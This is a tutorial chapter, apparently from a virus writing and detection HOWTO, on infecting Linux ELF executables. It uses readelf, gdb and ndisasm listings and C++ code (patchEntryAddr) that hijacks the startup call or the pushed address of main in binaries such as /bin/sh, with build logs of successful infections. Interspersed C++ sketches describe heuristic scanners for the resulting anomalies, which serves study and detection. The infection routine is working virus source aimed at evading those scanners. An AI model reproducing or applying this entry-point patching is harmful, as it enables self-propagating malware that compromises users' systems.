The longest part of the journey is said to be the passing of the gate.
Marcus Terentius Varro
Now that emotions have cooled down a bit, we can examine the infected executable and compare it with the original.
Command.
#!/bin/sh
cd tmp/one_step_closer/one
ls -l sh_infected
readelf -l sh_infected
Output.
-rwxrwxr-x    1 alba     alba       524060 Mar 17 16:32 sh_infected

Elf file type is EXEC (Executable file)
Entry point 0x80c1273
There are 6 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
  INTERP         0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x7a273 0x7a273 R E 0x1000
  LOAD           0x07a280 0x080c2280 0x080c2280 0x057e0 0x09bd0 RW  0x1000
  DYNAMIC        0x07f980 0x080c7980 0x080c7980 0x000e0 0x000e0 RW  0x4
  NOTE           0x000108 0x08048108 0x08048108 0x00020 0x00020 R   0x4

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.got .rel.bss .rel.plt .init .plt .text .fini .rodata
   03     .data .eh_frame .ctors .dtors .got .dynamic .bss
   04     .dynamic
   05     .note.ABI-tag
File size and code segment have grown as expected. Data segment and DYNAMIC segment moved accordingly:
infected.file_size - sh.file_size = 524060 - 519964 = 4096 = 0x1000
infected.LOAD[1].Filesiz - sh.LOAD[1].Filesiz = 0x7a273 - 0x79273 = 0x1000
infected.LOAD[2].Offset - sh.LOAD[2].Offset = 0x7a280 - 0x79280 = 0x1000
infected.DYNAMIC.Offset - sh.DYNAMIC.Offset = 0x7f980 - 0x7e980 = 0x1000
Let's give the heuristic scanner a try.
Command.
#!/bin/sh
echo '/bin/bash tmp/one_step_closer/one/sh_infected' \
| src/check_dist/check_dist.pl
Output.
tmp/one_step_closer/one/sh_infected virtaddr=0x80c2280 dist=0x00000d
2 files; min_distance=0x00000d max_distance=0x00100d
As predicted. This is like playing chess against oneself, and losing. Can't do much about it, though. I'll fix something else in revenge.
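The source of check_dist.pl is not shown in this section. The numbers it prints are consistent with one simple measurement: the gap in memory between the end of the code segment and the start of the data segment. The following C++ sketch assumes that this is what the scanner computes; segment_gap and its parameter names are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper, not taken from check_dist.pl.
// Returns the number of unused bytes in memory between the end of the
// code segment (first LOAD) and the start of the data segment (second LOAD).
std::uint32_t segment_gap(std::uint32_t code_vaddr,
                          std::uint32_t code_memsz,
                          std::uint32_t data_vaddr)
{
    const std::uint32_t code_end = code_vaddr + code_memsz;
    assert(data_vaddr >= code_end);  // the data segment follows the code segment
    return data_vaddr - code_end;
}
```

With the values from the readelf listing of sh_infected, segment_gap(0x08048000, 0x7a273, 0x080c2280) yields 0xd, the dist reported above. A code segment that is one page shorter (MemSiz 0x79273) yields 0x100d, which matches max_distance if the data segment of the original sits at the same virtual address.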
The value of Entry point changed dramatically. In the original it is in the first part of the file:
entry_point_ofs = 0x8059380 - 0x8048000 = 0x11380 = 70528 bytes.
The infected copy moved that to exactly 4096 bytes from the end of the code segment.
entry_point_ofs = 0x80c1273 - 0x8048000 = 0x79273 = 496243 bytes.
end_of_LOAD1 = 0x8048000 + 0x7a273 = 0x80c2273
entry_point_distance_to_end = 0x80c2273 - 0x80c1273 = 0x1000 = 4096
This is another property that scanners can spot easily. By restructuring our code we can make that number even smaller. But for a real cure we need stronger voodoo.
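A scanner could test for this distance in a few lines. The following C++ sketch is an illustration only; the function names and the one-page threshold are assumptions, not part of any existing tool.

```cpp
#include <cassert>
#include <cstdint>

// Distance in bytes from the entry point to the end of the LOAD segment
// that contains it. Arguments are virtual addresses and sizes as printed
// by readelf -l.
std::uint32_t entry_distance_to_end(std::uint32_t entry,
                                    std::uint32_t seg_vaddr,
                                    std::uint32_t seg_filesz)
{
    const std::uint32_t seg_end = seg_vaddr + seg_filesz;
    assert(entry >= seg_vaddr && entry < seg_end);  // entry must lie inside the segment
    return seg_end - entry;
}

// Hypothetical heuristic: flag executables that start running within the
// last `threshold` bytes of their code segment.
bool entry_near_segment_end(std::uint32_t entry,
                            std::uint32_t seg_vaddr,
                            std::uint32_t seg_filesz,
                            std::uint32_t threshold = 0x1000)
{
    return entry_distance_to_end(entry, seg_vaddr, seg_filesz) <= threshold;
}
```

For the infected copy (entry 0x80c1273, FileSiz 0x7a273) the distance is 0x1000 and the check fires. For the original (entry 0x8059380, FileSiz 0x79273) the distance is 0x67ef3 and it does not.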
If we choose to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though.
But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.
Command.
#!/bin/sh
entry_point=$( readelf -l /bin/bash | sed -ne 's/^Entry point //p' )
gdb /bin/bash -q <<EOT | sed -ne '/:$/,/hlt *$/p'
break *$entry_point
run
disassemble
EOT
Output.
(gdb) Dump of assembler code for function _start:
0x8059380 <_start>:     xor    %ebp,%ebp
0x8059382 <_start+2>:   pop    %esi
0x8059383 <_start+3>:   mov    %esp,%ecx
0x8059385 <_start+5>:   and    $0xfffffff0,%esp
0x8059388 <_start+8>:   push   %eax
0x8059389 <_start+9>:   push   %esp
0x805938a <_start+10>:  push   %edx
0x805938b <_start+11>:  push   $0x80ad030
0x8059390 <_start+16>:  push   $0x8058a60
0x8059395 <_start+21>:  push   %ecx
0x8059396 <_start+22>:  push   %esi
0x8059397 <_start+23>:  push   $0x8059480
0x805939c <_start+28>:  call   0x8058fc8 <__libc_start_main>
0x80593a1 <_start+33>:  hlt
Of course we have to check whether the code at the entry address really looks like the output above, just in case the target is already infected (by a superior virus). To implement the comparison we only need offsets and sizes, not the actual opcodes. But I will feel better with them right in front of me. And ndisasm starts counting at zero, which requires less brain activity.
Command.
#!/bin/sh
target=${1:-/bin/bash}
entry_point=$( \
  readelf -l $target \
  | sed -ne 's/^Entry point 0x//p' \
  | tr a-f A-F \
)
entry_point_ofs=$( echo "ibase=16; $entry_point - 08048000" | bc )
ndisasm -e $entry_point_ofs -U $target | sed -e '/hlt/q'
Output.
00000000  31ED              xor ebp,ebp
00000002  5E                pop esi
00000003  89E1              mov ecx,esp
00000005  83E4F0            and esp,byte -0x10
00000008  50                push eax
00000009  54                push esp
0000000A  52                push edx
0000000B  6830D00A08        push dword 0x80ad030
00000010  68608A0508        push dword 0x8058a60
00000015  51                push ecx
00000016  56                push esi
00000017  6880940508        push dword 0x8059480
0000001C  E827FCFFFF        call 0xfffffc48
00000021  F4                hlt
There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp is encoded relative to the location of the following instruction, however. This is described in the documentation of nasm:
CALL imm ; E8 rw/rd [8086]
[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.
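Applied to the listing above, the rule can be checked by hand. The following C++ sketch (the name call_target is made up for illustration) decodes the operand of a 32-bit near call and adds it to the address of the next instruction.

```cpp
#include <cassert>
#include <cstdint>

// Absolute target of a 5-byte "call rel32" (opcode E8) located at call_addr.
// The 32-bit operand is stored little-endian and is relative to the address
// of the instruction that follows the call. Unsigned arithmetic wraps
// modulo 2^32, which takes care of negative displacements.
std::uint32_t call_target(std::uint32_t call_addr, const unsigned char* insn)
{
    assert(insn[0] == 0xE8);  // only the rel32 form of call is handled
    const std::uint32_t rel = static_cast<std::uint32_t>(insn[1])
                            | static_cast<std::uint32_t>(insn[2]) << 8
                            | static_cast<std::uint32_t>(insn[3]) << 16
                            | static_cast<std::uint32_t>(insn[4]) << 24;
    return call_addr + 5 + rel;
}
```

For the bytes E8 27 FC FF FF at address 0x805939c this gives 0x8058fc8, the address gdb shows for __libc_start_main. With the zero-based offset 0x1c used by ndisasm it gives 0xfffffc48, as in the listing.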
Source - patchEntryAddr.
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int beyond_the_call = p.ehdr->e_entry + 0x21;
  int* patch_point = (int*)(target_entry_code + 0x1D);
  original_entry = beyond_the_call + *patch_point;
  *patch_point = newEntryAddr() - beyond_the_call;
  return true;
}
Output - build.
Infecting copy of /bin/sh... Ok
Infecting copy of /bin/tcsh... Ok
Infecting copy of /usr/bin/which... Ok
Output - test script.
ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/two/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
Output looks nice, but we had that already. What has increased code size and complexity gained us?
Source.
#!/bin/sh
( readelf -l /bin/bash
  readelf -l tmp/one_step_closer/one/sh_infected
  readelf -l tmp/one_step_closer/two/sh_infected
) | grep '^Entry point'
Output.
Entry point 0x8059380
Entry point 0x80c1273
Entry point 0x8059380
OK. One vulnerability of the infection is not visible to readelf anymore. But does that really help? It's still trivial to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.
Output.
00000000  31ED              xor ebp,ebp
00000002  5E                pop esi
00000003  89E1              mov ecx,esp
00000005  83E4F0            and esp,byte -0x10
00000008  50                push eax
00000009  54                push esp
0000000A  52                push edx
0000000B  6830D00A08        push dword 0x80ad030
00000010  68608A0508        push dword 0x8058a60
00000015  51                push ecx
00000016  56                push esi
00000017  6880940508        push dword 0x8059480
0000001C  E8D27E0600        call 0x67ef3
00000021  F4                hlt
The original value is 0xfffffc48, a backward call that resolves into a shared library. The new value, 0x67ef3, is a forward call that stays local to the executable and is easy to spot. So what's the point?
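Such a check might look like the following C++ sketch. It assumes, as the section mapping printed by readelf suggests, that .plt precedes .text, so an untouched startup stub calls backward. The function names are made up for illustration, and the rule is a heuristic for this particular toolchain only.

```cpp
#include <cassert>
#include <cstdint>

// Signed displacement encoded in a 5-byte "call rel32" instruction.
std::int64_t call_displacement(const unsigned char* insn)
{
    assert(insn[0] == 0xE8);  // only the rel32 form of call is handled
    const std::uint32_t raw = static_cast<std::uint32_t>(insn[1])
                            | static_cast<std::uint32_t>(insn[2]) << 8
                            | static_cast<std::uint32_t>(insn[3]) << 16
                            | static_cast<std::uint32_t>(insn[4]) << 24;
    // Interpret the 32-bit pattern as a two's complement number.
    return raw < 0x80000000u
        ? static_cast<std::int64_t>(raw)
        : static_cast<std::int64_t>(raw) - 0x100000000LL;
}

// Hypothetical heuristic: a startup call that jumps forward is suspicious.
bool call_goes_forward(const unsigned char* insn)
{
    return call_displacement(insn) > 0;
}
```

The original bytes E8 27 FC FF FF decode to a displacement of -0x3d9, the patched bytes E8 D2 7E 06 00 to +0x67ed2. Only the second one is flagged.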
gdb revealed the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but let's not be hasty.
Command.
#!/bin/sh
ldd /bin/bash
Output.
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40022000)
libdl.so.2 => /lib/libdl.so.2 (0x40026000)
libc.so.6 => /lib/libc.so.6 (0x4002a000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
Now that we have a filename we can search for the function in the library.
Command.
#!/bin/sh
library=$( ldd /bin/bash | perl -ane 'm/libc/ && print $F[2];' )
nm -D $library --line-numbers --no-sort | grep __libc_start_main
Output.
0001c278 T __libc_start_main /usr/src/build/53700-i386/BUILD/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c:53
First class service. We even got a line number from nm.
Command.
#!/bin/sh
# third character of IFS is a tab-stop, not just a space
IFS=' :	' read addr type name original_filename line_number < out/entry_point/nm
my_filename="/usr/src/redhat/SOURCES/${original_filename#*BUILD/}"

# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -e "$my_filename" ] || exit 0

sed -n "/^ *int\>/,$line_number p" \
< $my_filename \
> src/entry_point/__libc_start_main
Output.
int
/* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the
   BPs in the arglist of startup_info.main and startup_info.init. */
BP_SYM (__libc_start_main) (int (*main) (int, char **, char **),
                   int argc, char *__unbounded *__unbounded ubp_av,
                   void (*init) (void), void (*fini) (void),
                   void (*rtld_fini) (void), void *__unbounded stack_end)
{
  int *dummy_addr = &_dl_starting_up;
If you have a procedure with 10 parameters, you probably missed some (according to an old saying).
Let's see what this declaration tells us about the disassembled code. For one thing, arguments are pushed onto the stack in reverse order. This is the traditional C calling convention; it allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. Actual values for the arguments: main = 0x8059480, init = 0x8058a60, fini = 0x80ad030. The case of rtld_fini needs more documentation.
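These values can also be read straight from the bytes of the startup code, which is what a scanner would do. The C++ sketch below assumes the exact 34-byte layout shown in the ndisasm listing, with the opcode of push imm32 (0x68) at offsets 0x0B, 0x10 and 0x17. StartArgs, load_le32 and read_start_args are names made up for illustration.

```cpp
#include <cstddef>
#include <cstdint>

// Function pointers that _start hands to __libc_start_main.
struct StartArgs {
    std::uint32_t main_fn;
    std::uint32_t init_fn;
    std::uint32_t fini_fn;
};

// Read a little-endian 32-bit value from a byte buffer.
static std::uint32_t load_le32(const unsigned char* p)
{
    return static_cast<std::uint32_t>(p[0])
         | static_cast<std::uint32_t>(p[1]) << 8
         | static_cast<std::uint32_t>(p[2]) << 16
         | static_cast<std::uint32_t>(p[3]) << 24;
}

// Extract the pushed addresses from the startup stub. Returns false if the
// buffer is too short or the expected "push imm32" opcodes are missing.
bool read_start_args(const unsigned char* stub, std::size_t size, StartArgs& out)
{
    const std::size_t fini_push = 0x0B;  // pushed first, last argument of the three
    const std::size_t init_push = 0x10;
    const std::size_t main_push = 0x17;  // pushed last, first argument
    const unsigned char push_imm32 = 0x68;

    if (size < 0x22)
        return false;
    if (stub[fini_push] != push_imm32 ||
        stub[init_push] != push_imm32 ||
        stub[main_push] != push_imm32)
        return false;

    out.fini_fn = load_le32(stub + fini_push + 1);
    out.init_fn = load_le32(stub + init_push + 1);
    out.main_fn = load_le32(stub + main_push + 1);
    return true;
}
```

Fed with the 34 bytes of the listing, the function reports main_fn = 0x8059480, init_fn = 0x8058a60 and fini_fn = 0x80ad030.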
Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. We concentrate our efforts on main.
Source - patchEntryAddr.
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for last "push" */
  if (self_entry_code[0x17] != target_entry_code[0x17])
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int* patch_point = (int*)(target_entry_code + 0x18);
  original_entry = *patch_point;
  *patch_point = newEntryAddr();
  return true;
}
Output - test script.
ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/three/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
We see the same nice output again and again. So what's different this time?
Output.
00000000  31ED              xor ebp,ebp
00000002  5E                pop esi
00000003  89E1              mov ecx,esp
00000005  83E4F0            and esp,byte -0x10
00000008  50                push eax
00000009  54                push esp
0000000A  52                push edx
0000000B  6830D00A08        push dword 0x80ad030
00000010  68608A0508        push dword 0x8058a60
00000015  51                push ecx
00000016  56                push esi
00000017  6873120C08        push dword 0x80c1273
0000001C  E827FCFFFF        call 0xfffffc48
00000021  F4                hlt
The difference to the original is less obvious. Both values of main are local to the executable. But again the modified value is exactly 4096 bytes from the end of the code segment.
It seems that we achieved little. But the concept of studying source code to find patch points looks promising. I declare this battle a draw. It might not change the outcome of the war. Still it gives hope to fight on.